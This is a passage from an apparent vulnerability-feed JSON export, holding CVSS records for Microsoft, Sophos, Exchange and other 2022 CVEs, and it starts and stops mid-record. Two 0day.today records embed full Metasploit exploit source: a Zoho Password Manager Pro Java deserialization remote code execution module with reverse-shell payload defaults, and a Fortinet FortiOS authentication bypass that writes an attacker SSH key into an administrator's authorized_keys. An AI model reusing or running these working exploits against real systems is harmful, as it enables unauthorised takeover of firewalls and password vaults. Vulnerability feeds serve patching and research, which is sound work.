Edge (Chromium-based) Spoofing Vulnerability.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 5.3, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2022-10-11T19:15:00", "type": "cve", "title": "CVE-2022-41035", "cwe": ["CWE-362"], "bulletinFamily": "NVD", "cvss2": {}, "cvelist": ["CVE-2022-41035"], "modified": "2022-11-14T14:41:00", "cpe": [], "id": "CVE-2022-41035", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-41035", "cvss": {"score": 0.0, "vector": "NONE"}, "cpe23": []}, {"lastseen": "2023-03-02T23:39:02", "description": "Microsoft Exchange Server Elevation of Privilege Vulnerability.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-03T01:15:00", "type": "cve", "title": "CVE-2022-41040", "cwe": ["CWE-269"], "bulletinFamily": "NVD", "cvss2": {}, "cvelist": ["CVE-2022-41040"], "modified": "2023-03-02T22:15:00", "cpe": ["cpe:/a:microsoft:exchange_server:2019", "cpe:/a:microsoft:exchange_server:2013", "cpe:/a:microsoft:exchange_server:2016"], "id": "CVE-2022-41040", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-41040", "cvss": {"score": 0.0, "vector": "NONE"}, "cpe23": ["cpe:2.3:a:microsoft:exchange_server:2016:cumulative_update_22:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2019:cumulative_update_12:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2019:cumulative_update_11:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2016:cumulative_update_23:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2013:cumulative_update_23:*:*:*:*:*:*"]}, {"lastseen": "2023-02-09T14:28:28", "description": "A code injection vulnerability in the User Portal and Webadmin allows a remote attacker to execute code in Sophos Firewall version v19.0 MR1 and older.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-23T13:15:00", "type": "cve", "title": "CVE-2022-3236", "cwe": ["CWE-74"], "bulletinFamily": "NVD", "cvss2": {}, "cvelist": ["CVE-2022-3236"], "modified": "2022-09-28T19:11:00", "cpe": ["cpe:/a:sophos:firewall:19.0.1"], "id": "CVE-2022-3236", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-3236", "cvss": {"score": 0.0, "vector": "NONE"}, "cpe23": ["cpe:2.3:a:sophos:firewall:19.0.1:*:*:*:*:*:*:*"]}], "mscve": [{"lastseen": "2023-03-17T02:31:48", "description": "Microsoft Office Information Disclosure Vulnerability.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "LOW", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 3.3, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2022-10-11T07:00:00", "type": "mscve", "title": "Microsoft Office Information Disclosure Vulnerability", "bulletinFamily": "microsoft", "cvss2": {}, "cvelist": ["CVE-2022-41043"], "modified": "2022-12-13T08:00:00", "id": "MS:CVE-2022-41043", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-41043", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-03-17T02:31:54", "description": "Microsoft Office Remote Code Execution Vulnerability.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-10-11T07:00:00", "type": "mscve", "title": "Microsoft Office Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {}, "cvelist": ["CVE-2022-38048"], "modified": "2022-10-11T07:00:00", "id": "MS:CVE-2022-38048", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-38048", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-03-17T02:31:55", "description": "Microsoft has identified a vulnerability affecting the cluster connect feature of Azure Arc-enabled Kubernetes clusters. This vulnerability could allow an unauthenticated user to elevate their privileges and potentially gain administrative control over the Kubernetes cluster. Additionally, because Azure Stack Edge allows customers to deploy Kubernetes workloads on their devices via Azure Arc, Azure Stack Edge devices are also vulnerable to this vulnerability.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-10-11T07:00:00", "type": "mscve", "title": "Azure Arc-enabled Kubernetes cluster Connect Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {}, "cvelist": ["CVE-2022-37968"], "modified": "2022-10-11T07:00:00", "id": "MS:CVE-2022-37968", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-37968", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-03-17T02:31:48", "description": "Windows COM+ Event System Service Elevation of Privilege Vulnerability.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-11T07:00:00", "type": "mscve", "title": "Windows COM+ Event System Service Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {}, "cvelist": ["CVE-2022-41033"], "modified": "2022-10-11T07:00:00", "id": "MS:CVE-2022-41033", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-41033", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-03-17T02:31:56", "description": "Windows CryptoAPI Spoofing Vulnerability.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-10-11T07:00:00", "type": "mscve", "title": "Windows CryptoAPI Spoofing Vulnerability", "bulletinFamily": "microsoft", "cvss2": {}, "cvelist": ["CVE-2022-34689"], "modified": "2022-10-11T07:00:00", "id": "MS:CVE-2022-34689", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-34689", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-03-17T02:31:56", "description": "Windows TCP/IP Driver Denial of Service Vulnerability.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-10-11T07:00:00", "type": "mscve", "title": "Windows TCP/IP Driver Denial of Service Vulnerability", "bulletinFamily": "microsoft", "cvss2": {}, "cvelist": ["CVE-2022-33645"], "modified": "2022-10-11T07:00:00", "id": "MS:CVE-2022-33645", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-33645", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-03-17T02:31:52", "description": "Active Directory Certificate Services Elevation of Privilege Vulnerability.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-11T07:00:00", "type": "mscve", "title": "Active Directory Certificate Services Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {}, "cvelist": ["CVE-2022-37976"], "modified": "2022-10-18T07:00:00", "id": "MS:CVE-2022-37976", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-37976", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-03-17T02:31:56", "description": "Microsoft Edge (Chromium-based) Spoofing Vulnerability.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 5.3, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2022-10-03T07:00:00", "type": "mscve", "title": "Microsoft Edge (Chromium-based) Spoofing Vulnerability", "bulletinFamily": "microsoft", "cvss2": {}, "cvelist": ["CVE-2022-41035"], "modified": "2022-11-08T08:00:00", "id": "MS:CVE-2022-41035", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-41035", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-03-17T02:31:56", "description": "Microsoft Exchange Server Elevation of Privilege Vulnerability.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-30T07:00:00", "type": "mscve", "title": "Microsoft Exchange Server Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {}, "cvelist": ["CVE-2022-41040"], "modified": "2022-11-08T08:00:00", "id": "MS:CVE-2022-41040", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-41040", "cvss": {"score": 0.0, "vector": "NONE"}}], "zdt": [{"lastseen": "2022-08-04T10:00:02", "description": "This Metasploit module exploits a Java deserialization vulnerability in Zoho ManageEngine Pro before 12101 and PAM360 before 5510. Unauthenticated attackers can send a crafted XML-RPC request containing malicious serialized data to /xmlrpc to gain remote command execution as the SYSTEM user.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-04T00:00:00", "type": "zdt", "title": "Zoho Password Manager Pro XML-RPC Java Deserialization Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-35405"], "modified": "2022-08-04T00:00:00", "id": "1337DAY-ID-37890", "href": "https://0day.today/exploit/description/37890", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n include Msf::Exploit::JavaDeserialization\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Zoho Password Manager Pro XML-RPC Java Deserialization',\n 'Description' => %q{\n This module exploits a Java deserialization vulnerability in Zoho ManageEngine Pro\n before 12101 and PAM360 before 5510. Unauthenticated attackers can send a\n crafted XML-RPC request containing malicious serialized data to /xmlrpc to\n gain RCE as the SYSTEM user.\n },\n 'Author' => [\n 'Vinicius', # Discovery\n 'Y4er', # Writeup\n 'Grant Willcox' # Exploit\n ],\n 'References' => [\n ['CVE', '2022-35405'],\n ['URL', 'https://xz.aliyun.com/t/11578'], # Writeup\n ['URL', 'https://www.manageengine.com/products/passwordmanagerpro/advisory/cve-2022-35405.html'], # Advisory\n ['URL', 'https://archives2.manageengine.com/passwordmanagerpro/12101/ManageEngine_PasswordManager_Pro_12100_to_12101.ppm'] # The patch.\n ],\n 'DisclosureDate' => '2022-06-24', # Vendor release date of patch and new installer, as advisory lacks any date.\n 'License' => MSF_LICENSE,\n 'Platform' => ['win'],\n 'Arch' => [ARCH_CMD, ARCH_X64],\n 'Privileged' => true,\n 'Targets' => [\n [\n 'Windows EXE Dropper',\n {\n 'Arch' => ARCH_X64,\n 'Type' => :windows_dropper,\n 'DefaultOptions' => { 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp' }\n }\n ],\n [\n 'Windows Command',\n {\n 'Arch' => ARCH_CMD,\n 'Type' => :windows_command,\n 'Space' => 3000,\n 'DefaultOptions' => { 'PAYLOAD' => 'cmd/windows/reverse_powershell' }\n }\n ],\n [\n 'Windows Powershell',\n {\n 'Arch' => ARCH_X64,\n 'Type' => :windows_powershell,\n 'DefaultOptions' => { 'PAYLOAD' => 'cmd/windows/powershell/x64/meterpreter/reverse_tcp' }\n }\n ]\n ],\n 'DefaultTarget' => 1,\n 'DefaultOptions' => {\n 'SSL' => true\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n )\n )\n\n register_options([\n Opt::RPORT(7272),\n OptString.new('TARGETURI', [true, 'Base path', '/'])\n ])\n end\n\n def check\n # Send an empty serialized object\n res = send_request_xmlrpc('')\n\n unless res\n return CheckCode::Unknown('Target did not respond to check.')\n end\n\n if res.body.include?('Failed to read result object: null')\n return CheckCode::Vulnerable('Target can deserialize arbitrary data.')\n end\n\n CheckCode::Safe('Target cannot deserialize arbitrary data.')\n end\n\n def exploit\n print_status(\"Executing #{target.name} for #{datastore['PAYLOAD']}\")\n case target['Type']\n when :windows_command\n execute_command(payload.encoded)\n when :windows_dropper\n cmd_target = targets.select { |target| target['Type'] == :windows_command }.first\n execute_cmdstager({ linemax: cmd_target.opts['Space'] })\n when :windows_powershell\n execute_command(cmd_psh_payload(payload.encoded, payload.arch.first, remove_comspec: true))\n end\n end\n\n def execute_command(cmd, _opts = {})\n vprint_status(\"Executing command: #{cmd}\")\n\n res = send_request_xmlrpc(\n generate_java_deserialization_for_command('CommonsBeanutils1', 'cmd', cmd)\n )\n\n unless res && res.code == 200\n fail_with(Failure::UnexpectedReply, \"Failed to execute command: #{cmd}\")\n end\n\n print_good(\"Successfully executed command: #{cmd}\")\n end\n\n def send_request_xmlrpc(data)\n # http://xmlrpc.com/\n # https://ws.apache.org/xmlrpc/\n send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/xmlrpc'),\n 'ctype' => 'text/xml',\n 'data' => <<~XML\n <?xml version=\"1.0\"?>\n <methodCall>\n <methodName>#{rand_text_alphanumeric(8..42)}</methodName>\n <params>\n <param>\n <value>\n <struct>\n <member>\n <name>#{rand_text_alphanumeric(8..42)}</name>\n <value>\n <serializable xmlns=\"http://ws.apache.org/xmlrpc/namespaces/extensions\">#{Rex::Text.encode_base64(data)}</serializable>\n </value>\n </member>\n </struct>\n </value>\n </param>\n </params>\n </methodCall>\n XML\n )\n end\n\nend\n", "sourceHref": "https://0day.today/exploit/37890", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-10-20T22:08:29", "description": "This Metasploit module exploits an authentication bypass vulnerability in the Fortinet FortiOS, FortiProxy, and FortiSwitchManager API to gain access to a chosen account and then adds an SSH key to the authorized_keys file of the chosen account, allowing you to login to the system with the chosen account. Successful exploitation results in remote code execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-19T00:00:00", "type": "zdt", "title": "Fortinet FortiOS / FortiProxy / FortiSwitchManager Authentication Bypass Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-40684"], "modified": "2022-10-19T00:00:00", "id": "1337DAY-ID-38045", "href": "https://0day.today/exploit/description/38045", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::Remote::SSH\n prepend Msf::Exploit::Remote::AutoCheck\n\n attr_accessor :ssh_socket\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Fortinet FortiOS, FortiProxy, and FortiSwitchManager authentication bypass.',\n 'Description' => %q{\n This module exploits an authentication bypass vulnerability\n in the Fortinet FortiOS, FortiProxy, and FortiSwitchManager API\n to gain access to a chosen account. And then add a SSH key to the\n authorized_keys file of the chosen account, allowing\n to login to the system with the chosen account.\n\n Successful exploitation results in remote code execution.\n },\n 'Author' => [\n 'Heyder Andrade <@HeyderAndrade>', # Metasploit module\n 'Zach Hanley <@hacks_zach>', # PoC\n ],\n 'References' => [\n ['CVE', '2022-40684'],\n ['URL', 'https://www.fortiguard.com/psirt/FG-IR-22-377'],\n ['URL', 'https://www.horizon3.ai/fortios-fortiproxy-and-fortiswitchmanager-authentication-bypass-technical-deep-dive-cve-2022-40684'],\n ],\n 'License' => MSF_LICENSE,\n 'DisclosureDate' => '2022-10-10', # Vendor advisory\n 'Platform' => ['unix', 'linux'],\n 'Arch' => [ARCH_CMD],\n 'Privileged' => true,\n 'Targets' => [\n [\n 'FortiOS',\n {\n 'DefaultOptions' => {\n 'PAYLOAD' => 'generic/ssh/interact'\n },\n 'Payload' => {\n 'Compat' => {\n 'PayloadType' => 'ssh_interact'\n }\n }\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'RPORT' => 443,\n 'SSL' => true\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [\n IOC_IN_LOGS,\n ARTIFACTS_ON_DISK # SSH key is added to authorized_keys file\n ]\n }\n )\n )\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to the Fortinet CMDB API', '/api/v2/cmdb/']),\n OptString.new('USERNAME', [false, 'Target username (Default: auto-detect)', nil]),\n OptString.new('PRIVATE_KEY', [false, 'SSH private key file path', nil]),\n OptString.new('KEY_PASS', [false, 'SSH private key password', nil]),\n OptString.new('SSH_RPORT', [true, 'SSH port to connect to', 22]),\n OptBool.new('PREFER_ADMIN', [false, 'Prefer to use the admin user if one is detected', true])\n ]\n )\n end\n\n def username\n if datastore['USERNAME']\n @username ||= datastore['USERNAME']\n else\n @username ||= detect_username\n end\n end\n\n def ssh_rport\n datastore['SSH_RPORT']\n end\n\n def current_keys\n @current_keys ||= read_keys\n end\n\n def ssh_keygen\n # ssh-keygen -t rsa -m PEM -f `openssl rand -hex 8`\n if datastore['PRIVATE_KEY']\n @ssh_keygen ||= Net::SSH::KeyFactory.load_data_private_key(\n File.read(datastore['PRIVATE_KEY']),\n datastore['KEY_PASS'],\n datastore['PRIVATE_KEY']\n )\n else\n @ssh_keygen ||= OpenSSL::PKey::EC.generate('prime256v1')\n end\n end\n\n def ssh_private_key\n ssh_keygen.to_pem\n end\n\n def ssh_pubkey\n Rex::Text.encode_base64(ssh_keygen.public_key.to_blob)\n end\n\n def authorized_keys\n pubkey = Rex::Text.encode_base64(ssh_keygen.public_key.to_blob)\n \"#{ssh_keygen.ssh_type} #{pubkey} #{username}@localhost\"\n end\n\n def fortinet_request(params = {})\n send_request_cgi(\n {\n 'ctype' => 'application/json',\n 'agent' => 'Report Runner',\n 'headers' => {\n 'Forwarded' => \"for=\\\"[127.0.0.1]:#{rand(1024..65535)}\\\";by=\\\"[127.0.0.1]:#{rand(1024..65535)}\\\"\"\n }\n }.merge(params)\n )\n end\n\n def check\n vprint_status(\"Checking #{datastore['RHOST']}:#{datastore['RPORT']}\")\n # a normal request to the API should return a 401\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, Rex::Text.rand_text_alpha_lower(6)),\n 'ctype' => 'application/json'\n })\n\n return CheckCode::Unknown('Target did not respond to check.') unless res\n return CheckCode::Safe('Target seems not affected by this vulnerability.') unless res.code == 401\n\n # Trying to bypasss the authentication and get the sshkey from the current targeted user it should return a 200 if vulnerable\n res = fortinet_request({\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, '/system/status')\n })\n\n return CheckCode::Safe unless res&.code == 200\n\n version = res.get_json_document['version']\n\n print_good(\"Target is running the version #{version}, which is vulnerable.\")\n\n Socket.tcp(rhost, ssh_rport, connect_timeout: datastore['SSH_TIMEOUT']) { |sock| return CheckCode::Safe('However SSH is not open, so adding a ssh key wouldn\\t give you access to the host.') unless sock }\n\n CheckCode::Vulnerable('And SSH is running which makes it exploitable.')\n end\n\n def cleanup\n return unless ssh_socket\n\n # it assumes our key is the last one and set it to a random text. The API didn't respond to DELETE method\n data = {\n \"ssh-public-key#{current_keys.empty? ? '1' : current_keys.size}\" => '\"\"'\n }\n\n fortinet_request({\n 'method' => 'PUT',\n 'uri' => normalize_uri(target_uri.path, '/system/admin/', username),\n 'data' => data.to_json\n })\n end\n\n def detect_username\n vprint_status('User auto-detection...')\n res = fortinet_request(\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, '/system/admin')\n )\n users = res.get_json_document['results'].collect { |e| e['name'] if (e['accprofile'] == 'super_admin' && e['trusthost1'] == '0.0.0.0 0.0.0.0') }.compact\n # we prefer to use admin, but if it doesn't exist we chose a random one.\n if datastore['PREFER_ADMIN']\n vprint_status(\"PREFER_ADMIN is #{datastore['PREFER_ADMIN']}, but if it isn't found we will pick a random one.\")\n users.include?('admin') ? 'admin' : users.sample\n else\n vprint_status(\"PREFER_ADMIN is #{datastore['PREFER_ADMIN']}, we will get a random that is not the admin.\")\n (users - ['admin']).sample\n end\n end\n\n def add_ssh_key\n if current_keys.include?(authorized_keys)\n # then we'll remove that on cleanup\n print_good('Your key is already in the authorized_keys file')\n return\n end\n vprint_status('Adding SSH key to authorized_keys file')\n # Adding the SSH key as the last entry in the authorized_keys file\n keystoadd = current_keys.first(2) + [authorized_keys]\n data = keystoadd.map.with_index { |key, idx| [\"ssh-public-key#{idx + 1}\", \"\\\"#{key}\\\"\"] }.to_h\n\n res = fortinet_request({\n 'method' => 'PUT',\n 'uri' => normalize_uri(target_uri.path, '/system/admin/', username),\n 'data' => data.to_json\n })\n fail_with(Failure::UnexpectedReply, 'Failed to add SSH key to authorized_keys file.') unless res&.code == 500\n body = res.get_json_document\n fail_with(Failure::UnexpectedReply, 'Unexpected reponse from the server after adding the key.') unless body.key?('cli_error') && body['cli_error'] =~ /SSH key is good/\n end\n\n def read_keys\n vprint_status('Reading SSH key from authorized_keys file')\n res = fortinet_request({\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, '/system/admin/', username)\n })\n fail_with(Failure::UnexpectedReply, 'Failed read current SSH keys') unless res&.code == 200\n result = res.get_json_document['results'].first\n ['ssh-public-key1', 'ssh-public-key2', 'ssh-public-key3'].map do |key|\n result[key].gsub('\"', '') unless result[key].empty?\n end.compact\n end\n\n def do_login(ssh_options)\n # ensure we don't have a stale socket hanging around\n ssh_options[:proxy].proxies = nil if ssh_options[:proxy]\n begin\n ::Timeout.timeout(datastore['SSH_TIMEOUT']) do\n self.ssh_socket = Net::SSH.start(rhost, username, ssh_options)\n end\n rescue Rex::ConnectionError\n fail_with(Failure::Unreachable, 'Disconnected during negotiation')\n rescue Net::SSH::Disconnect, ::EOFError\n fail_with(Failure::Disconnected, 'Timed out during negotiation')\n rescue Net::SSH::AuthenticationFailed\n fail_with(Failure::NoAccess, 'Failed authentication')\n rescue Net::SSH::Exception => e\n fail_with(Failure::Unknown, \"SSH Error: #{e.class} : #{e.message}\")\n end\n\n fail_with(Failure::Unknown, 'Failed to start SSH socket') unless ssh_socket\n end\n\n def exploit\n print_status(\"Executing exploit on #{datastore['RHOST']}:#{datastore['RPORT']} target user: #{username}\")\n add_ssh_key\n vprint_status('Establishing SSH connection')\n ssh_options = ssh_client_defaults.merge({\n auth_methods: ['publickey'],\n key_data: [ ssh_private_key ],\n port: ssh_rport\n })\n ssh_options.merge!(verbose: :debug) if datastore['SSH_DEBUG']\n\n do_login(ssh_options)\n\n handler(ssh_socket)\n end\nend\n", "sourceHref": "https://0day.today/exploit/38045", "cvss": {"score": 0.0, "vector": "NONE"}}], "zdi": [{"lastseen": "2022-10-14T11:55:54", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Microsoft Word. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of DOCX files. Crafted data in a DOCX file can cause a pointer to be reused after it has been freed. An attacker can leverage this vulnerability to execute code in the context of the current process.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-10-14T00:00:00", "type": "zdi", "title": "Microsoft Word DOCX File Parsing Use-After-Free Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-38048"], "modified": "2022-10-14T00:00:00", "id": "ZDI-22-1411", "href": "https://www.zerodayinitiative.com/advisories/ZDI-22-1411/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-11-18T23:27:59", "description": "This vulnerability allows remote attackers to escalate privileges on affected installations of Microsoft Exchange. Authentication is required to exploit this vulnerability. The specific flaw exists within the Autodiscover service. The issue results from the lack of proper validation of a URI prior to accessing resources. An attacker can leverage this vulnerability to escalate privileges to resources normally protected from the user.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": 